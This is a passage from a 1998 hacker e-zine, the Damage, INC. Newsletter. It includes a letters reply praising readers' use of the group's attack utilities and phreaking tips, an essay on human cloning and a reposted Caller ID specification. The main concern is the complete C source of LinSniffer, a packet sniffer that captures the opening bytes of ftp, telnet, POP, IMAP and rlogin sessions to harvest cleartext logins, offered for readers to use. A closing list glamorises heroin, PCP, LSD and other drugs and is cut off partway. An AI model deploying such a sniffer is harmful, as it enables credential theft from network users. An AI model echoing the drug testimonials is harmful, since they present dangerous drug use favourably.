||
As for the BUST.BAT, I'm glad it was useful in your friend's situation.
|
||
I hope that everyone also finds my tips on how to avoid being busted
|
||
(in this issue) to be just as reliable. ;) As for NUKE, NUKEKB and
|
||
the other Damage, INC. Utilities, I'm glad they're being put to good
|
||
use by people in area codes other than 519. They were written with
|
||
the intention that they'd be used... so it feels good knowing that
|
||
people are using them to their own advantage and benefit.
|
||
|
||
I've written every Introduction and Closing Comments thus far,
|
||
excluding this issue in which Shatazar wrote them. The quotes for
|
||
each issue (except for this one) were also chosen by me. So, I'm
|
||
glad you enjoyed them man. That's where most of my creativity is
|
||
expended. ;) As for the themes, yeah, that's exactly what we've
|
||
been attempting to do with each new issue. Some of the introductions
|
||
that I've written are what I'm most proud of. I was pleased with a
|
||
few Closing Comments as well.
|
||
|
||
The Journalist's PSYCHIC WARRIOR article was very well written and
|
||
one that I greatly enjoyed reading also. A few people have made
|
||
comments about that particular article. ;)
|
||
|
||
That's excellent that people have learned from Blackie Lawless'
|
||
h/p related articles. A couple of readers have said that he should
|
||
become an instructor/teacher because of the way that he is able to
|
||
express himself. I agree with those sentiments. ;) Hopefully he'll
|
||
be able to contribute articles again in the near future. As for the
|
||
people that are now able to use PBXs, that's the type of feedback that
|
||
we really enjoy hearing.
|
||
|
||
As for the research, quite a bit goes into those articles. Whenever
|
||
possible, we use several sources of information to ensure that the
|
||
information we provide is accurate and reliable. We don't want to
|
||
misinform readers (like the mass media frequently does). Therefore,
|
||
avoiding that is a big priority and taken seriously by Damage, INC.
|
||
Personally, I read newspapers, numerous magazines, watch several
|
||
news stations, read text files and information from internet sites,
|
||
and sometimes speak with sources (people involved) before writing an
|
||
article on a topic. I try to research and get as much insight as
|
||
possible before actually writing about something. To be honest, I'm
|
||
not sure how much time goes into research. It varies from topic to
|
||
topic. With certain topics, I know them fairly well before I even
|
||
begin to research it since it interests me. Some things affect me
|
||
directly, thus some research has already been done. I do a fair
|
||
amount of reading about various things (Conspiracies, Big Brother,
|
||
current events etc.) though. As for how we decide what topics are
|
||
written about and who writes the articles, sometimes it can be a
|
||
complex process. Hehe. The topics are usually discussed privately
|
||
beforehand... and if someone has an idea for an article on a certain
|
||
topic, they tell me about it. Then I notify everyone once they've
|
||
selected a section for the upcoming issue. So, then I put their alias
|
||
in the Contents beside that section and everyone else knows that it's
|
||
been taken once they download a new, updated, pre-release copy. Other
|
||
than that, I don't delegate which Damage, INC. Members write for each
|
||
section. Nothing is "assigned" to anyone in that respect. That's
|
||
the first time anyone has asked about that. ;) As for an estimation
|
||
on the amount of time I think we spend writing the Damage, INC.
|
||
Newsletter, that's a difficult question to answer man. The best answer
|
||
that I can give is to say that countless hours go into thinking of new
|
||
ideas, research, writing, programming and testing source code, editing,
|
||
proofreading, and distributing each issue. As Editor/Publisher, I
|
||
wouldn't begin to count the hours that are dedicated to this relatively
|
||
small publication. It does take more time and work than most of our
|
||
readers realize though. In fact, lately I've thought about changing
|
||
it from a monthly newsletter to one that's released with no fixed
|
||
schedule. Basically, it's a tremendous amount of work and sometimes
|
||
time is the greatest factor working against us. In other words, we
|
||
have been rushed to finish certain issues and that's when it becomes
|
||
more of a chore than an enjoyable endeavour.
|
||
|
||
Thanks for the kind wishes for Damage, INC. and the Damage, INC.
|
||
Newsletter. We intend to expand and grow stronger. We hope that
|
||
our readers will grow, learn and continue to think from an informed,
|
||
objective, unbiased, enlightened perspective. Diversity and knowledge
|
||
are the keys to the success of the group in my opinion. As long as
|
||
we're able to release quality and think of new ideas, then Damage, INC.
|
||
will remain as an important, useful source of information. The group's
|
||
existence isn't dependant upon any one member. It consists of capable,
|
||
intelligent, enlightened individuals. However, there's no "prez" or
|
||
official "leader". Therein lies much of its strength. We encourage
|
||
individualism, and the group doesn't rely on a "leading figure" to
|
||
hold it together. Even though I'm the founding member, I have taken
|
||
measures to prevent a collapse of Damage, INC. in the event that I am
|
||
forced to quit. I just decided to include this small portion that
|
||
describes some of the inner workings of the group, in case people are
|
||
interested in that type of thing. ;) More information relating to
|
||
the group will be in the Damage, INC. FAQ, which should be ready to
|
||
release soon. I believe that I've responded to every portion of your
|
||
letter to the editor, so I'll end my rambling now...
|
||
|
||
|
||
OBJECTIVE OPINIONS - {OPINIONS}
|
||
The Consequences of Cloning Humans:
|
||
|
||
Human Cloning is a hot topic in the media one week, and virtually ignored the
|
||
next. Many articles have already been written about it, viewpoints have been
|
||
shared, heated debates have been started, laws have been written and enacted,
|
||
and yet the majority of what's been said and done has been from the same
|
||
perspective. That is the reason that I've decided to share my thoughts and
|
||
opinions on cloning humans. Obviously, you can agree or disagree with the
|
||
points that I make and the opinions that I express. However, I ask that you
|
||
at least consider them and not ignore the many possibilities and consequences
|
||
of cloning human beings. After you've finished reading this article, form
|
||
your own opinions from an informed standpoint.
|
||
|
||
Religious groups, governments and many average people are beginning to panic
|
||
and think irrationally about cloning and the problems that it might present
|
||
in the future. The 'poster child' for the development of human cloning seems
|
||
to be an eccentric Chicago physicist named Richard Seed. Seemingly out of
|
||
nowhere, he dropped a bombshell on the media by announcing that he wants to be
|
||
the first person to clone human beings. At this point, I'm sure many of you
|
||
have already heard about Dolly, the sheep that was cloned in Scotland. You may
|
||
even know a little about the technique that was used. You may also know that
|
||
it took many attempts (reportedly 277) before they were successful at cloning
|
||
a sheep. That amount of repeated attempts to produce a cloned sheep might seem
|
||
like a huge amount to some, and a small amount to others. However, just by
|
||
using common sense and logic, you can determine that it'll also take many
|
||
attempts before a human being can be cloned successfully. Perhaps more than a
|
||
thousand attempts. Obviously, the technique that was used to clone a sheep
|
||
hasn't been perfected... In fact, it hasn't been used yet to clone humans.
|
||
Thus, the science of cloning still has a long way to progress before it'll ever
|
||
be widely used or accepted by the scientific community. At this point, many
|
||
scientists are condemning anyone that wants to try to clone humans. Some of
|
||
them site scientific reasons, stating that it's unsafe, there would be a great
|
||
loss of life in failed attempts and strange results etc. Others feel that it's
|
||
morally wrong to clone human beings. Richard Seed doesn't fit into the same
|
||
category as most other scientists of this time. He's been described as being
|
||
a well educated, brilliant, bizarre, unpopular, publicity seeking, misfit that
|
||
most scientists refuse to support. Indeed, Seed is faced with great opposition.
|
||
President Bill Clinton has banned human cloning in the United States and deemed
|
||
it to be "untested and unsafe and morally unacceptable." Ian Wilmut, the person
|
||
responsible for producing Dolly, doesn't agree with human cloning either. He
|
||
also posed the question "Should we really consider or allow experiments of this
|
||
kind with people?"
|
||
|
||
Will Seed be the one that plants the first seeds of Human Cloning? Many
|
||
so-called 'experts' doubt his abilities and don't feel that he's capable of
|
||
cloning a human. In fact, Seed has been mocked and ridiculed by numerous
|
||
mainstream scientists. In Seed's defense, he did graduate from Harvard with
|
||
a doctorate in physics. He then became interested and involved in biomedicine.
|
||
He and his brother Randolph Seed (a Chicago surgeon) formed a company called
|
||
Fertility & Genetics Research Inc. that helped infertile women conceive
|
||
children. Therefore, Seed does have a strong background in genetics which
|
||
should help contribute to his cloning experiments. He's also convinced that
|
||
the public opinion will eventually shift and the opposition to cloning will
|
||
cease. Seed has been quoted as saying "God made man in his own image, God
|
||
intended for man to become one with God. Cloning... is the first serious step
|
||
in becoming one with God." during a radio interview. During a CNN interview
|
||
Seed stated that "Man, will develop the technology and the science and the
|
||
capability to have an indefinite life span." That's quite a bold prediction.
|
||
If anything Richard Seed is a very confident, brash, blunt person... for which
|
||
he deserves some respect in my opinion.
|
||
|
||
Now that you've read some of the things that Seed has said, I will elaborate
|
||
on his words... and share my opinions with you. When Seed spoke about man
|
||
having an indefinite life span, he was probably referring to cloning humans
|
||
for organs. Growing human organs and using them to replace the ones that are
|
||
failing us, could enable us to live much longer lives. In essence, his use
|
||
of the term "indefinite" is correct. Our life span would be increased
|
||
tremendously. However, a price would have to be paid for that benefit. As
|
||
in, the technology was be abused, misused, and the black market sale of organs
|
||
would be big business. It's already profitable today, but with the ability to
|
||
clone organs, the governments of the world would almost assuredly want a piece
|
||
of the action. Not only that, the rich would benefit the most since they would
|
||
be the ones that could afford to pay for the procedures and extend the length
|
||
of their lives. The pandora's box would be wide open. I can vividly picture
|
||
the commercials and advertisements now: "Immortality for only $99,999 in three
|
||
easy payments." "Free dinner with your first transplant operation." The rich
|
||
would have the choice of cloning their own organs, or buying organs that were
|
||
cloned from someone else. If that's not an ominous thought, what about cloning
|
||
babies? Imagine the vain, narcissistic, wealthy fat cat couples proudly
|
||
displaying their cloned children. It's the ultimate in vanity. They could brag
|
||
to their friends and neighbours about the fact that they're babies are in their
|
||
own image, exact replicas, with the same DNA. Do we really need another Bill
|
||
Gates? Honestly, I shudder at the thought of that. I'm sure he'd also have a
|
||
few clones of himself just for spare parts, in case they're ever needed in an
|
||
emergency.
|
||
|
||
There's also another issue. Clones wouldn't be considered to be "real human
|
||
beings", therefore they would most likely end up as slaves. Just imagine an
|
||
entire work force of clones... employed by large corporations... with their
|
||
genetics designed specifically for certain tasks. Would killing a clone be
|
||
illegal? Would mistreating them be considered immoral? Would they have any
|
||
human rights at all? I think not. In fact, it wouldn't surprise me if entire
|
||
armies were made up of clones. They'd be more expendable than genetically
|
||
normal soldiers. Their DNA could be easily modified to create superior soldiers
|
||
for different combat duties. They could test and select the best soldiers to
|
||
clone. If a million of them became casualties in war, they'd already have
|
||
soldier clones in training ready to replace them. They wouldn't even have to
|
||
notify anyone about their deaths, or report the number of clones that were
|
||
killed in battle. Nobody would care. Wars would be waged indefinitely, as
|
||
there wouldn't be any reason to end them... since the loss of clones wouldn't
|
||
matter to anyone on either side. The clones wouldn't be important, they'd
|
||
just be biological machines owned by us. Obviously, a clone can't be called an
|
||
individual, which is what makes it so vulnerable to oppression and enslavement.
|
||
|
||
What would be the result of taking DNA from someone such as Charles Manson
|
||
and cloning them? What about cloning Albert Einstein? Would convicts be used
|
||
in experimental human cloning? Would it be considered wrong to clone certain
|
||
people, and acceptable to clone others? Would the clone be the exactly the same
|
||
psychologically, emotionally, intellectually etc. as the original person? Does
|
||
genetics dictate everything, or do life experiences play a role? What is the
|
||
leading factor in determining how someone is going to develop? How much of us
|
||
is caused due to genetics? Is the environment that a person grows up in
|
||
critical to their behaviour and intellect? Would clones of intelligent people
|
||
be able to attain the same level of knowledge, after being born at a different
|
||
time? What role does time play? If the clone can't meet and associate with the
|
||
same people, can they then learn the same things in the same way or would that
|
||
be a limitation? Technology also evolves and changes over time. The clones
|
||
would be exposed to a different world than the original. How would that affect
|
||
them? They don't know the answers to those important questions yet. There are
|
||
too many possibilities to list or even begin to discuss. At this point, they
|
||
can only theorize about what could/would happen. However, I can give my opinion
|
||
and attempt to predict the results of their efforts to clone humans. I believe
|
||
that they would try to clone certain people that are/were highly intelligent.
|
||
That could backfire though. What if massive amounts of geniuses were cloned to
|
||
"fix" the world's current problems? Would that really be a solution? Or, is
|
||
it possible that it would create more serious problems? I don't claim to have
|
||
all of the answers, but I have thought about this issue and considered the
|
||
possibilities and consequences of cloning humans. I think that eventually
|
||
someone, somewhere will clone a human being and then the "cloning race" will
|
||
start between nations. Or perhaps "clone wars" is a more appropriate term.
|
||
It's inevitable. In any event, a Brave New World awaits us...
|
||
|
||
In closing, Human Cloning is an ethical, moral, religious, scientific issue
|
||
that'll continue to be debated for many years. In my view though, cloning
|
||
human beings is a human issue. I'm against anything that removes individualism
|
||
and destroys the essence of what it is to be human. In the end, humanity will
|
||
suffer as a direct result of the misuse of cloning. The consequences can be
|
||
disastrous, as explained earlier in the article. That's not only my opinion,
|
||
but also my personal prediction. Not all technology is good, useful and
|
||
beneficial to us. Also, any technology that is viewed as being beneficial can
|
||
also be just as destructive. Lastly, think about and consider all of the other
|
||
possible uses for cloning that were not mentioned in this short article. We're
|
||
literally on the verge of entering a Brave New World. I suggest that you
|
||
continue to educate yourselves, be prepared for any changes that occur and
|
||
become informed individuals... not just citizens.
|
||
|
||
Written by BLACKENED ú Damage, INC. (C)opyright 1998.
|
||
|
||
|
||
REPORTS FROM THE FRONT - {REPORTS}
|
||
Caller ID Specifications:
|
||
|
||
This article was included since many people are still either misinformed or
|
||
lacking in knowledge relating to Caller ID. As you can see by the date below,
|
||
it's not recent information. However, it still applies today. The only thing
|
||
that has changed since it was written is that Caller ID service is now widely
|
||
available. Bell supports Caller ID service basically everywhere in North
|
||
America now. (All States and Provinces). Other than that, the information
|
||
contained is still useful and relevant.
|
||
|
||
From: sichermn@beach.csulb.edu (Jeff Sicherman)
|
||
Newsgroups: comp.dcom.telecom
|
||
Subject: Caller-ID Specifications
|
||
Message-ID: <telecom11.989.7@eecs.nwu.edu>
|
||
Date: 1 Dec 91 01:30:39 GMT
|
||
Sender: Telecom@eecs.nwu.edu
|
||
Organization: Cal State Long Beach
|
||
Lines: 181
|
||
|
||
This is a copy of the data sheet picked up at the Rockwell
|
||
booth at the COMDEX show.
|
||
|
||
INTRODUCTION
|
||
|
||
Calling Number Delivery (CND), better known as Caller ID, is a
|
||
telephone service intended for residential and small business
|
||
customers. It allows the called Customer Premises Equipment (CPE) to
|
||
receive a calling party's directory number and the date and time of
|
||
the call during the first four second silent interval in the ringing
|
||
cycle. The customer must contact a Bellcore Client Company to
|
||
initiate CND service.
|
||
|
||
According to Pacific Bell representatives, the following states and
|
||
district currently support CND service: Delaware, District of
|
||
Columbia, Florida, Georgia, Idaho, Kentucky, Louisiana, Maine,
|
||
Maryland, Nebraska, Nevada, New Jersey, Oklahoma, Tennessee, Vermont,
|
||
Virginia, and West Virginia.
|
||
|
||
The following states are scheduled to support CND service by April,
|
||
1992: Alaska, Arizona, California, Colorado, Illinois, Indiana, Iowa,
|
||
Massachusetts, Mississippi, New Hampshire, New York, North Carolina,
|
||
North Dakota, Ohio, Oregon, Rhode Island, and South Carolina.
|
||
|
||
PARAMETERS
|
||
|
||
The data signalling interface has the following characteristics:
|
||
Link Type: 2-wire, simplex
|
||
Transmission Scheme: Analog, phase-coherent FSK
|
||
Logical 1 (mark) 1200 +/- 12 Hz
|
||
Logical 0 (space) 2200 +/- 22 Hz
|
||
Transmission Rate: 1200 bps
|
||
Transmission Level: 13.5 +/- dBm into 900 ohm load
|
||
|
||
(I have copied this data as presented. I believe the transmission
|
||
level is meant to be -13.5 dBm.)
|
||
|
||
PROTOCOL
|
||
|
||
The protocol uses 8-bit data words (bytes), each bounded by a start
|
||
bit and a stop bit. The CND message uses the Single Data Message
|
||
format shown below.
|
||
|
||
Channel Carrier Message Message Data Checksum
|
||
Seizure Signal Type Length Word(s) Word
|
||
Signal Word Word
|
||
|
||
CHANNEL SEIZURE SIGNAL
|
||
|
||
The channel seizure is 30 continuous bytes of 55h (01010101) providing
|
||
a detectable alternating function to the CPE (i.e. the modem data
|
||
pump).
|
||
|
||
CARRIER SIGNAL
|
||
|
||
The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to
|
||
condition the receiver for data.
|
||
|
||
MESSAGE TYPE WORD
|
||
|
||
The message type word indicates the service and capability associated
|
||
with the data message. The message type word for CND is 04h
|
||
(00000100).
|
||
|
||
MESSAGE LENGTH WORD
|
||
|
||
The message length word specifies the total number of data words
|
||
to follow.
|
||
|
||
DATA WORDS
|
||
|
||
The data words are encoded in ASCII and represent the following
|
||
information:
|
||
|
||
o The first two words represent the month
|
||
o The next two words represent the day of the month
|
||
o The next two words represent the hour in local military time
|
||
o The next two words represent the minute after the hour
|
||
o The calling party's directory number is represented by the
|
||
remaining words in the data word field
|
||
|
||
If the calling party's directory number is not available to the
|
||
terminating central office, the data word field contains an ASCII "O".
|
||
If the calling party invokes the privacy capability, the data word
|
||
field contains an ASCII "P".
|
||
|
||
CHECKSUM WORD
|
||
|
||
The Checksum Word contains the twos complement of the modulo 256
|
||
sum of the other words in the data message (i.e., message type,
|
||
message length, and data words). The receiving equipment may
|
||
calculate the modulo 256 sum of the received words and add this
|
||
sum to the reveived checksum word. A result of zero generally
|
||
indicates that the message was correctly received. Message
|
||
retransmission is not supported.
|
||
|
||
EXAMPLE CND SINGLE DATA MESSAGE
|
||
|
||
An example of a received CND message, beginning with the message
|
||
type word, follows:
|
||
|
||
04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51
|
||
|
||
04h= Calling number delivery information code (message type word)
|
||
12h= 18 decimal; Number of data words (date,time, and directory
|
||
number words)
|
||
ASCII 30,39= 09; September
|
||
ASCII 33,30= 30; 30th day
|
||
ASCII 31,32= 12; 12:00 PM
|
||
ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM)
|
||
ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling
|
||
party's directory number
|
||
51h= Checksum Word
|
||
|
||
DATA ACCESS ARRANGEMENT (DAA) REQUIREMENTS
|
||
|
||
To receive CND information, the modem monitors the phone line between
|
||
the first and second ring bursts without causing the DAA to go off
|
||
hook in the conventional sense, which would inhibit the transmission
|
||
of CND by the local central office. A simple modification to an
|
||
existing DAA circuit easily accomplishes the task.
|
||
|
||
(I will mail the Rockwell data sheet, which includes the suggested
|
||
schematic diagram.)
|
||
|
||
MODEM REQUIREMENTS
|
||
|
||
Although the data signalling interface parameters match those of a
|
||
Bell 202 modem, the receiving CPE need not be a Bell 202 modem. A
|
||
V.23 1200 bps modem receiver may be used to demodulate the Bell 202
|
||
signal. The ring indicate bit (RI) may be used on a modem to indicate
|
||
when to monitor the phone line for CND information. After the RI bit
|
||
sets, indicating the first ring burst, the host waits for the RI bit
|
||
to reset. The host then configures the modem to monitor the phone
|
||
line for CND information.
|
||
|
||
(I'm skipping some Rockwell-specific information here.)
|
||
|
||
According to Bellcore specifications, CND signalling starts as early
|
||
as 300 mS after the first ring burst and ends at least 475 mS before
|
||
the second ring burst.
|
||
|
||
APPLICATIONS
|
||
Modem manufacturers will soon be implementing new modem features
|
||
based on CND information as this service becomes widely
|
||
available.
|
||
|
||
Once CND information is received the user may process the
|
||
information in a number of ways.
|
||
|
||
1. The date, time, and calling party's directory number can be
|
||
displayed.
|
||
|
||
2. Using a look-up table, the calling party's directory number
|
||
can be correlated with his or her name and the name
|
||
displayed.
|
||
|
||
3. CND information can also be used in additional ways such as
|
||
for:
|
||
|
||
a. Bulletin board applications
|
||
b. Black-listing applications
|
||
c. Keeping logs of system user calls, or
|
||
d. Implementing a telemarketing data base
|
||
|
||
REFERENCES
|
||
For more information on Calling Number Delivery (CND), refer to
|
||
Bellcore publications TR-TSY-000030 and TR-TSY-000031.
|
||
|
||
To obtain Bellcore documents contact:
|
||
|
||
Bellcore Customer Service
|
||
60 New England Avenue, Room 1B252
|
||
Piscataway, NJ 08834-4196
|
||
(201) 699-5800
|
||
|
||
|
||
SOURCE AND SCRIPTS - {SOURCE}
|
||
Linux Sniffer source code:
|
||
|
||
In the spotlight this month we're featuring a Linux Sniffer. As you can see,
|
||
it's not by Damage, INC. <sniff...sniff> but hopefully in future issues there
|
||
will be more source code that was written by us. The source hasn't been
|
||
modified in any way, nor are we taking credit for this sniffer. We're simply
|
||
including it so that you can use it, study the code and learn from it. ;) If
|
||
you want some other sniffers, then check out some web sites that carry them.
|
||
|
||
-------------------------------------------------------------------------------
|
||
/*
|
||
LinSniffer 0.03 [BETA]
|
||
Mike Edulla
|
||
medulla@infosoc.com
|
||
*/
|
||
|
||
|
||
#include <sys/types.h>
|
||
#include <sys/socket.h>
|
||
#include <sys/time.h>
|
||
#include <netinet/in.h>
|
||
#include <netdb.h>
|
||
#include <string.h>
|
||
#include <linux/if.h>
|
||
#include <signal.h>
|
||
#include <stdio.h>
|
||
#include <arpa/inet.h>
|
||
#include <linux/socket.h>
|
||
#include <linux/ip.h>
|
||
#include <linux/tcp.h>
|
||
#include <linux/if_ether.h>
|
||
|
||
|
||
int openintf(char *);
|
||
int read_tcp(int);
|
||
int filter(void);
|
||
int print_header(void);
|
||
int print_data(int, char *);
|
||
char *hostlookup(unsigned long int);
|
||
void clear_victim(void);
|
||
void cleanup(int);
|
||
|
||
|
||
struct etherpacket
|
||
{
|
||
struct ethhdr eth;
|
||
struct iphdr ip;
|
||
struct tcphdr tcp;
|
||
char buff[8192];
|
||
}ep;
|
||
|
||
struct
|
||
{
|
||
unsigned long saddr;
|
||
unsigned long daddr;
|
||
unsigned short sport;
|
||
unsigned short dport;
|
||
int bytes_read;
|
||
char active;
|
||
time_t start_time;
|
||
} victim;
|
||
|
||
struct iphdr *ip;
|
||
struct tcphdr *tcp;
|
||
int s;
|
||
FILE *fp;
|
||
|
||
#define CAPTLEN 512
|
||
#define TIMEOUT 30
|
||
#define TCPLOG "tcp.log"
|
||
|
||
int openintf(char *d)
|
||
{
|
||
int fd;
|
||
struct ifreq ifr;
|
||
int s;
|
||
fd=socket(AF_INET, SOCK_PACKET, htons(0x800));
|
||
if(fd < 0)
|
||
{
|
||
perror("cant get SOCK_PACKET socket");
|
||
exit(0);
|
||
}
|
||
strcpy(ifr.ifr_name, d);
|
||
s=ioctl(fd, SIOCGIFFLAGS, &ifr);
|
||
if(s < 0)
|
||
{
|
||
close(fd);
|
||
perror("cant get flags");
|
||
exit(0);
|
||
}
|
||
ifr.ifr_flags |= IFF_PROMISC;
|
||
s=ioctl(fd, SIOCSIFFLAGS, &ifr);
|
||
if(s < 0) perror("cant set promiscuous mode");
|
||
return fd;
|
||
}
|
||
|
||
int read_tcp(int s)
|
||
{
|
||
int x;
|
||
while(1)
|
||
{
|
||
x=read(s, (struct etherpacket *)&ep, sizeof(ep));
|
||
if(x > 1)
|
||
{
|
||
if(filter()==0) continue;
|
||
x=x-54;
|
||
if(x < 1) continue;
|
||
return x;
|
||
}
|
||
}
|
||
}
|
||
|
||
int filter(void)
|
||
{
|
||
int p;
|
||
p=0;
|
||
if(ip->protocol != 6) return 0;
|
||
if(victim.active != 0)
|
||
if(victim.bytes_read > CAPTLEN)
|
||
{
|
||
fprintf(fp, "\n----- [CAPLEN Exceeded]\n");
|
||
clear_victim();
|
||
return 0;
|
||
}
|
||
if(victim.active != 0)
|
||
if(time(NULL) > (victim.start_time + TIMEOUT))
|
||
{
|
||
fprintf(fp, "\n----- [Timed Out]\n");
|
||
clear_victim();
|
||
return 0;
|
||
}
|
||
if(ntohs(tcp->dest)==21) p=1; /* ftp */
|
||
if(ntohs(tcp->dest)==23) p=1; /* telnet */
|
||
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
|
||
if(ntohs(tcp->dest)==109) p=1; /* pop2 */
|
||
if(ntohs(tcp->dest)==143) p=1; /* imap2 */
|
||
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
|
||
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
|
||
if(victim.active == 0)
|
||
if(p == 1)
|
||
if(tcp->syn == 1)
|
||
{
|
||
victim.saddr=ip->saddr;
|
||
victim.daddr=ip->daddr;
|
||
victim.active=1;
|
||
victim.sport=tcp->source;
|
||
victim.dport=tcp->dest;
|
||
victim.bytes_read=0;
|
||
victim.start_time=time(NULL);
|
||
print_header();
|
||
}
|
||
if(tcp->dest != victim.dport) return 0;
|
||
if(tcp->source != victim.sport) return 0;
|
||
if(ip->saddr != victim.saddr) return 0;
|
||
if(ip->daddr != victim.daddr) return 0;
|
||
if(tcp->rst == 1)
|
||
{
|
||
victim.active=0;
|
||
alarm(0);
|
||
fprintf(fp, "\n----- [RST]\n");
|
||
clear_victim();
|
||
return 0;
|
||
}
|
||
if(tcp->fin == 1)
|
||
{
|
||
victim.active=0;
|
||
alarm(0);
|
||
fprintf(fp, "\n----- [FIN]\n");
|
||
clear_victim();
|
||
return 0;
|
||
}
|
||
return 1;
|
||
}
|
||
|
||
|
||
int print_header(void)
|
||
{
|
||
fprintf(fp, "\n");
|
||
fprintf(fp, "%s => ", hostlookup(ip->saddr));
|
||
fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest));
|
||
}
|
||
|
||
int print_data(int datalen, char *data)
|
||
{
|
||
int i=0;
|
||
int t=0;
|
||
|
||
victim.bytes_read=victim.bytes_read+datalen;
|
||
for(i=0;i != datalen;i++)
|
||
{
|
||
if(data[i] == 13) { fprintf(fp, "\n"); t=0; }
|
||
if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;}
|
||
if(t > 75) {t=0;fprintf(fp, "\n");}
|
||
}
|
||
}
|
||
|
||
|
||
main(int argc, char **argv)
|
||
{
|
||
s=openintf("eth0");
|
||
ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
|
||
tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);
|
||
signal(SIGHUP, SIG_IGN);
|
||
signal(SIGINT, cleanup);
|
||
signal(SIGTERM, cleanup);
|
||
signal(SIGKILL, cleanup);
|
||
signal(SIGQUIT, cleanup);
|
||
if(argc == 2) fp=stdout;
|
||
else fp=fopen(TCPLOG, "at");
|
||
if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);}
|
||
clear_victim();
|
||
for(;;)
|
||
{
|
||
read_tcp(s);
|
||
if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
|
||
fflush(fp);
|
||
}
|
||
}
|
||
|
||
char *hostlookup(unsigned long int in)
|
||
{
|
||
static char blah[1024];
|
||
struct in_addr i;
|
||
struct hostent *he;
|
||
|
||
i.s_addr=in;
|
||
he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET);
|
||
if(he == NULL) strcpy(blah, inet_ntoa(i));
|
||
else strcpy(blah, he->h_name);
|
||
return blah;
|
||
}
|
||
|
||
void clear_victim(void)
|
||
{
|
||
victim.saddr=0;
|
||
victim.daddr=0;
|
||
victim.sport=0;
|
||
victim.dport=0;
|
||
victim.active=0;
|
||
victim.bytes_read=0;
|
||
victim.start_time=0;
|
||
}
|
||
|
||
void cleanup(int sig)
|
||
{
|
||
fprintf(fp, "Exiting...\n");
|
||
close(s);
|
||
fclose(fp);
|
||
exit(0);
|
||
}
|
||
-------------------------------------------------------------------------------
|
||
|
||
|
||
THE JOURNALIST'S TOP TEN LIST - {TOP TEN}
|
||
"Drugs and their effects"
|
||
|
||
|
||
1. MARIJUANA
|
||
Names: Cannabis, grass, pot, dope, weed, ganja, bud, green, maryjane.
|
||
"The first few times I did pot were awesome! Me and my buddy made
|
||
this huge pipe out of 3 one-litre pop bottles. We would smoke two
|
||
bowls and be absolutely fucked! We used to laugh for three hours
|
||
straight, at everything and anything. One time we lay on his bed and
|
||
listened to stairway to heaven. Music had never sounded so good that
|
||
night; I felt like my body was becoming one with the bed. Those were
|
||
times that I'll never ever forget, no matter how much pot I smoke. ;)"
|
||
|
||
2. L.S.D
|
||
Names: LSD, hits, acid, blotter, burgers, paper, trips, candy.
|
||
"It was the first time I had done acid. Looking back, this shit was
|
||
definitely the cleanest and purest stuff I've ever done. A friend and
|
||
I took one hit each. There were cartoon characters on the back of the
|
||
hits. After half an hour I was rushing from head to toe. Two hours
|
||
later I was so fucked I couldn't remember my own name. I do
|
||
remember playing with the kitchen knife, wanting to see my own blood.
|
||
The comedown was also one of the best I have ever experienced. We
|
||
talked about life, and philosophy. My mind was very expanded at that
|
||
moment. I felt a peace and calmness within me that I have only
|
||
experienced two other times; but that's another story."
|
||
|
||
3. HEROIN
|
||
Names: Heroin, junk, smack, dope,
|
||
"They said the heroin rush was better than an orgasm. I just had to
|
||
know for myself. The thought of using a hypodermic needle kinda
|
||
scared me, but I had snorted coke before, so was not too scared to do
|
||
a little heroin. A few seconds after I plunged the warm liquid into
|
||
my bloodstream I felt a wave of ecstasy explode in my body. I was in
|
||
heaven. Nothing mattered on junk. Bliss had been attained, why strive
|
||
for anything else? I enjoyed my experience with heroin. I don't think
|
||
I'll ever do it again. I liked it too much, I would probably end up
|
||
a junkie dying of AIDS or something."
|
||
|
||
4. MDMA
|
||
Names: MDMA, ecstasy, 'e', adam, eve, xtc.
|
||
"I prefer to do E at raves personally. It's just a much better
|
||
atmosphere for the drug. E keeps me going all night, which is nice.
|
||
It never fucks me up too much, which is also nice. I can still talk
|
||
to people and make sense. That's one of the reasons I do E at raves.
|
||
There is a vibe of friendliness, openness and love. E makes me feel
|
||
alright about the world. I like the connected feeling I get when I
|
||
do E."
|
||
|
||
5. COCAINE
|
||
Names: Cocaine, coke, cola, white god, blow.
|
||
"The first time I did coke I snorted it. We had gotten it from a
|
||
reliable source, so I didn't hesitate. I rolled up a crisp new twenty
|
||
and inserted one end into my nostril. I covered the other nostril and
|
||
snorted the first rail. I switched nostrils and snorted back the
|
||
second line. I immediately felt a rush of exhiliration pulse through
|
||
my body. My heart was racing, and I felt invincible. I lit a
|
||
cigarette and took a few puffs. At this point I heard a ringing in my
|
||
ears. It got progressively louder until I felt like a locomotion was
|
||
thundering through my head. Coke is fucking crazy like that. Its
|
||
as if you're on the edge of the world, looking out into the abyss."
|
||
|
||
6. PCP
|
||
Names: PCP, Angel Dust.
|
||
"I've heard crazy things about PCP; things like people cutting their
|
||
own limbs off, or killing their wife and filleting her. Still, that
|
||
did not deter me from saying yes when my friend came back saying 'no
|
||
acid, but I got PCP'. My friend snorted his. I ate a bit, and laced
|
||
the rest in a joint with weed. I didn't get as fucked up as I expected
|
||
but nevertheless, things were pretty wierd. Fortunately I still have
|
||
two arms and two legs. ;) I doubt I'll do PCP again."
|
||
|
||
7. DMT
|
||
Names: DMT. Method of ingestion: Inhalation of DMT vapours.
|
||
"...Suddenly everything melts away. I am left floating in nothingness.
|
||
In front of me little sets of eyes pop out of the darkness. These
|
||
are followed by distorted voices, communicating some unknown language.
|
||
Images of alternate beings flood my vision. Colors spew out from
|
||
geometric shapes twisting and morphing into a million different
|
||
structures. I feel myself being pulled forward, through the
|
||
magnificent hallucinations that bombard my reality. I have arrived on
|
||
another planet. I have travelled the universe in my mind."
|
||
|
||
8. PEYOTE
|
||
Names: Peyote, cactus.
|
||
"Doing peyote was inevitable for me. I had been studying native
|
